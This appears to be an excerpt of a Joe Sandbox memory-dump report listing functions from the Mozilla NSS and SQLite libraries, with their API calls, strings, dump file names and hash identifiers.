Part of subcall function 6C530600: GetProcAddress.KERNEL32(?,?), ref: 6C530623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C57C14F
PR_LoadLibraryWithFlags.NSS3 ref: 6C57C183
free.MOZGLUE(00000000), ref: 6C57C18E
PR_LoadLibrary.NSS3(?), ref: 6C57C1A3
PR_EnterMonitor.NSS3 ref: 6C57C1D4
PR_ExitMonitor.NSS3 ref: 6C57C1F3
PR_CallOnce.NSS3(6C6A2318,6C57CA70), ref: 6C57C210
PR_EnterMonitor.NSS3 ref: 6C57C22B
PR_ExitMonitor.NSS3 ref: 6C57C247
PR_EnterMonitor.NSS3 ref: 6C57C26A
PR_ExitMonitor.NSS3 ref: 6C57C287
PR_UnloadLibrary.NSS3(?), ref: 6C57C2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C57C392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C57C3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6C57C3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C57C782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C57C7B5
PR_UnloadLibrary.NSS3(?), ref: 6C57C7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6C57C82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C57C8BF
PORT_Alloc_Util.NSS3(?), ref: 6C57C8D5
free.MOZGLUE(00000000), ref: 6C57C900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C57C9C7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C57C9E5
free.MOZGLUE(00000000), ref: 6C57CA5A

Strings

NSC_GetFunctionList, xrefs: 6C57C093
NSS_FORCE_TOKEN_LOCK, xrefs: 6C57C77D
nss_mod_log, xrefs: 6C57C3CC
NSS_DEBUG_PKCS11_MODULE, xrefs: 6C57C38D
Vendor NSS FIPS Interface, xrefs: 6C57C34A
NSS_DISABLE_UNLOAD, xrefs: 6C57C7B0
NSS_ReturnModuleSpecData, xrefs: 6C57C275
FC_GetInterface, xrefs: 6C57C054
NSC_ModuleDBFunc, xrefs: 6C57C0FC
PKCS 11, xrefs: 6C57C2F9, 6C57C314
FC_GetFunctionList, xrefs: 6C57C098
NSC_GetInterface, xrefs: 6C57C04F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
API String ID: 4243957313-3613044529
Opcode ID: 9609df0e0ea57bb4dc8818c8620488c1c2a7f250c8c71cc4e672c3588e3ecdc1
Instruction ID: 2049696c2871ad96652677f50e2ebf5128ba3fadef7bdea2e58da05177c1fb3c
Opcode Fuzzy Hash: 9609df0e0ea57bb4dc8818c8620488c1c2a7f250c8c71cc4e672c3588e3ecdc1
Instruction Fuzzy Hash: D24261B1644204DFDF24DF96EC86B5E3BB1FB46308F044029D9099BB21E735E994CBA9

Function 6C653FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6C653FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C653FFE
malloc.MOZGLUE(-00000003), ref: 6C654016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C68FC62), ref: 6C65404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C65407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6540A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C6540D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C654112
malloc.MOZGLUE(00000000), ref: 6C65411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C65414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C654160
free.MOZGLUE(?), ref: 6C65416C
malloc.MOZGLUE(?), ref: 6C6541AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C6541EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C654520), ref: 6C654244
GetEnvironmentStrings.KERNEL32 ref: 6C65424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6542B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6542E4
malloc.MOZGLUE(00000002), ref: 6C6542FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C654342
GetStdHandle.KERNEL32(000000F6), ref: 6C6543AB
GetStdHandle.KERNEL32(000000F5), ref: 6C6543B2
GetStdHandle.KERNEL32(000000F4), ref: 6C6543B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6C654403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C654410

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C65445E
CloseHandle.KERNEL32(?), ref: 6C65446B
free.MOZGLUE(?), ref: 6C654482
free.MOZGLUE(00000000), ref: 6C654492
free.MOZGLUE(00000000), ref: 6C6544A4
GetLastError.KERNEL32 ref: 6C6544B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C6544BE
free.MOZGLUE(?), ref: 6C6544C7
free.MOZGLUE(00000000), ref: 6C6544D5
free.MOZGLUE(00000000), ref: 6C6544EA

Strings

NSPR_INHERIT_FDS=, xrefs: 6C6541E9
=, xrefs: 6C6544F8
D, xrefs: 6C654396

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 0c68741099d987406d44922de1e911396a3c9a2816e9e6f55d8e2c17a1d0e8de
Instruction ID: fe2101588ead4a10ef19fe1d53f8c7ea0c7b6b0fc1719af51534132f90404244
Opcode Fuzzy Hash: 0c68741099d987406d44922de1e911396a3c9a2816e9e6f55d8e2c17a1d0e8de
Instruction Fuzzy Hash: 9402F670E053519FEB108F69C8807BEBBB4AF16308F7441A8DC56A7741D7B1A835CB99

Function 6C5A4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C58601B,?,00000000,?), ref: 6C5A486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C5A48A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C5A48BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C5A48DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C5A48F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C5A490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C5A4919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C5A493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5A4970
PORT_Alloc_Util.NSS3(00000001), ref: 6C5A49A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C5A49AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5A49D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C5A49F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C5A4A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C5A4A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C5A4A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C5A4A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C5A4A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C5A4A81
free.MOZGLUE(00000000), ref: 6C5A4AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C5A4ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C5A4ADC
free.MOZGLUE(00000000), ref: 6C5A4B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C5A4B33

Part of subcall function 6C5A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A413D
Part of subcall function 6C5A4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5A4162
Part of subcall function 6C5A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A416B
Part of subcall function 6C5A4120: PL_strncasecmp.NSS3(2BZl,?,00000001), ref: 6C5A4187
Part of subcall function 6C5A4120: NSSUTIL_ArgSkipParameter.NSS3(2BZl), ref: 6C5A41A0
Part of subcall function 6C5A4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A41B4
Part of subcall function 6C5A4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C5A41CC
Part of subcall function 6C5A4120: NSSUTIL_ArgFetchValue.NSS3(2BZl,?), ref: 6C5A4203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C5A4B53
free.MOZGLUE(00000000), ref: 6C5A4B94
free.MOZGLUE(?), ref: 6C5A4BA7
free.MOZGLUE(00000000), ref: 6C5A4BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5A4BC8

Strings

rootFlags, xrefs: 6C5A4AB9, 6C5A4B2E
timeout, xrefs: 6C5A4A38, 6C5A4A7B
hasRootTrust, xrefs: 6C5A4B4D
slotFlags, xrefs: 6C5A4A22
every, xrefs: 6C5A4A66
askpw, xrefs: 6C5A4A4A
hasRootCerts, xrefs: 6C5A4AD6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: f10432493aed2c040e43105826300d968305c55c9e134d5d8bfe4b5c2789983a
Instruction ID: b819d2ae044993fd777676549a962db4aff73e212bd8bc87acede9566a1ff264
Opcode Fuzzy Hash: f10432493aed2c040e43105826300d968305c55c9e134d5d8bfe4b5c2789983a
Instruction Fuzzy Hash: 35C11770E0525A9FEF10CFEA9C40BAE7BB8AF46308F141425EC55A7B01EB31D916C7A5

Function 6C566D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C66A8EC,0000006C), ref: 6C566DC6
memcpy.VCRUNTIME140(?,6C66A958,0000006C), ref: 6C566DDB
memcpy.VCRUNTIME140(?,6C66A9C4,00000078), ref: 6C566DF1
memcpy.VCRUNTIME140(?,6C66AA3C,0000006C), ref: 6C566E06
memcpy.VCRUNTIME140(?,6C66AAA8,00000060), ref: 6C566E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C566E38

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C566E76
TlsGetValue.KERNEL32 ref: 6C56726F
EnterCriticalSection.KERNEL32(?), ref: 6C567283

Strings

!, xrefs: 6C567123

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 3b8b99531794b4ee1087ab52dadfaf58e7d32bcc32a811a0a9f0896afecb64cf
Instruction ID: 19b5e6fef3ab4759794844d7f367978c7c099bd0464939b916ddc3c1ba3eb941
Opcode Fuzzy Hash: 3b8b99531794b4ee1087ab52dadfaf58e7d32bcc32a811a0a9f0896afecb64cf
Instruction Fuzzy Hash: CF727D75D05229DFDF60CF29CC8879ABBB5AB49304F1441A9D80DA7B11EB31AE84CF91

Function 6C52D810 Relevance: 48.0, APIs: 15, Strings: 12, Instructions: 760COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C52D832
memset.VCRUNTIME140(00000000,00000000,00000220,?,?,?,?,?,?,?,?,?,6C52D804,?,?), ref: 6C52D8AF
sqlite3_mprintf.NSS3(MATCH), ref: 6C52DC8D

Part of subcall function 6C52F420: sqlite3_initialize.NSS3 ref: 6C52F432
Part of subcall function 6C52F420: sqlite3_initialize.NSS3 ref: 6C52F441

EnterCriticalSection.KERNEL32(?), ref: 6C52DE64
LeaveCriticalSection.KERNEL32(?), ref: 6C52DEB7

Part of subcall function 6C4CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C52F9C9,?,6C52F4DA,6C52F9C9,?,?,6C4F369A), ref: 6C4CCA7A
Part of subcall function 6C4CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4CCB26

Strings

BINARY, xrefs: 6C52D9B7, 6C52D9CD, 6C52D9E1
RTRIM, xrefs: 6C52DA15
%s at line %d of [%.10s], xrefs: 6C52E032, 6C52E0F1, 6C52E14E, 6C52E2E6
il, xrefs: 6C52D98A
automatic extension loading failed: %s, xrefs: 6C52E27E
MATCH, xrefs: 6C52DC56, 6C52DC88, 6C52DCCD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52E023, 6C52E0E2, 6C52E13F, 6C52E2D7
API call with %s database connection pointer, xrefs: 6C52E0D4, 6C52E131, 6C52E2C9
temp, xrefs: 6C52DC04
misuse, xrefs: 6C52E02D, 6C52E0EC, 6C52E149, 6C52E2E1
invalid, xrefs: 6C52E0CF, 6C52E12C, 6C52E2C4
NOCASE, xrefs: 6C52D9F9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$sqlite3_initialize$EnterLeave$memsetsqlite3_mprintf
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$misuse$temp$il
API String ID: 3173223877-3562150886
Opcode ID: 133ed8bd9485adbded2d9975431289b8be4f60c6baca77aa52a4c9229102c8ed
Instruction ID: 7da10a06082a50243bbe49672955a20143e3ed24b3dd95a3a9728b3036a799ba
Opcode Fuzzy Hash: 133ed8bd9485adbded2d9975431289b8be4f60c6baca77aa52a4c9229102c8ed
Instruction Fuzzy Hash: E8527971E046419BEB14CF36CC80BAAB7F1BF96308F084629D8055BB81E779E895CBD5

Function 6C4D3C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4D3C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C4D3D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4D3EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4D3ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4D3F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4D4052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4D406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C4D410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4D449C

Strings

%s at line %d of [%.10s], xrefs: 6C4D4495, 6C4D44F9, 6C4D459E, 6C4D4769, 6C4D4809
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4D4452, 6C4D4486, 6C4D44EA, 6C4D4571, 6C4D4580, 6C4D458F, 6C4D475A, 6C4D47FA
database corruption, xrefs: 6C4D4490, 6C4D44F4, 6C4D4599, 6C4D4764, 6C4D4804

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: ddfd78cc7f0e1e0a988f028e57581cc6af1d73e05883f6cc563433654515e5ca
Instruction ID: 10d9d45069210174b2b7800ee36112cf41dc70314765d4cbc52c2b63a343a298
Opcode Fuzzy Hash: ddfd78cc7f0e1e0a988f028e57581cc6af1d73e05883f6cc563433654515e5ca
Instruction Fuzzy Hash: A382AF74A002058FCB04EF69C4A0F9AB7B2BF89358F269199D905ABB51D731FC42CF95

Function 6C5AAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5AACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C5AACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C5AACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C5AAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C5AADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5AADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5AADF0

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5AB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5AB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5AB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5AB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C5AB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5AB40C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: d88f78228f83185b744bcc639c3aba21be469dc42541e207b0c61bd95cf12bc8
Instruction ID: 5fe7d210e8f6f5de554ab57e554c82aebf211777709fc1f44291fd488db06c8e
Opcode Fuzzy Hash: d88f78228f83185b744bcc639c3aba21be469dc42541e207b0c61bd95cf12bc8
Instruction Fuzzy Hash: 0222B071904300EFE700DF56CC40B9A77E1BF84308F24896CE9595B7A2E772E85ACB96

Function 6C4F1F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4F25F3

Strings

no tables specified, xrefs: 6C4F26BE
recursive reference in a subquery: %s, xrefs: 6C4F22E5
H, xrefs: 6C4F329F
%s.%s.%s, xrefs: 6C4F302D
no such index: "%s", xrefs: 6C4F319D
table %s has %d values for %d columns, xrefs: 6C4F316C
too many columns in result set, xrefs: 6C4F3012
unsafe use of virtual table "%s", xrefs: 6C4F30D1
multiple recursive references: %s, xrefs: 6C4F22E0
'%s' is not a function, xrefs: 6C4F2FD2
H, xrefs: 6C4F322D
a NATURAL join may not have an ON or USING clause, xrefs: 6C4F32C1
access to view "%s" prohibited, xrefs: 6C4F2F4A
too many references to "%s": max 65535, xrefs: 6C4F2FB6
%s.%s, xrefs: 6C4F2D68
cannot join using column %s - column not present in both tables, xrefs: 6C4F32AB
no such table: %s, xrefs: 6C4F26AC
cannot have both ON and USING clauses in the same join, xrefs: 6C4F32B5

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: 2961af3cae596713d27924d36914346425768287e9d89f37bd32dd2ea9565313
Instruction ID: d235e19c1dbfd92ac88c88cdcfe4b306b9819ed58ebdd3667135bbc543fbfea4
Opcode Fuzzy Hash: 2961af3cae596713d27924d36914346425768287e9d89f37bd32dd2ea9565313
Instruction Fuzzy Hash: CAD27B74E042898FDB24CF95C494F9DBBB1FF89308F288169D865AB751DB31A843CB91

Function 6C52ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C52ED38

Part of subcall function 6C4C4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4C4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C52EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C52EFE4

Part of subcall function 6C5EDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C4C5001,?,00000003,00000000), ref: 6C5EDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C52F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C52F129
